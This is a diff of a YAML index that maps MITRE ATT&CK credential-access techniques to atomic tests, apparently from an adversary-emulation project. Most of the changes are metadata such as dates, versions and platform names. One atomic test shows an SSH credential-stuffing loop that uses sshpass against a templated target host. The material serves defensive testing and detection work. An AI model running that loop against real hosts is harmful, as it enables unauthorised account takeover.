       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -51872,11 +52627,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -51920,11 +52674,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -51948,8 +52701,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -51965,11 +52718,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -51980,11 +52732,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -51994,16 +52748,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -52041,13 +52795,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -52056,6 +52807,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -52063,11 +52815,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -52085,13 +52837,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -52104,6 +52853,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -52117,12 +52867,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -52154,17 +52905,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -52237,7 +52985,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests:
     - name: AppleScript - Prompt User for Password
@@ -52270,7 +53017,7 @@ credential-access:
         name: bash
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -52279,6 +53026,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -52297,18 +53045,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -52332,13 +53080,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -52364,6 +53109,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -52375,18 +53121,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -52405,9 +53151,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests:
     - name: SSH Credential Stuffing From MacOS
@@ -52443,7 +53186,7 @@ credential-access:
           for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -52472,24 +53215,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -52524,13 +53269,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -52608,14 +53350,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -52631,6 +53372,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -52639,13 +53381,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -52653,15 +53395,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -52672,9 +53410,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -52720,7 +53457,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -52739,17 +53476,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -52782,10 +53518,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -52822,11 +53557,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -52894,34 +53628,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -52930,20 +53640,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -52975,7 +53707,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -53001,13 +53733,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -53024,24 +53754,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -53082,36 +53812,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -53132,6 +53839,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -53146,52 +53854,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
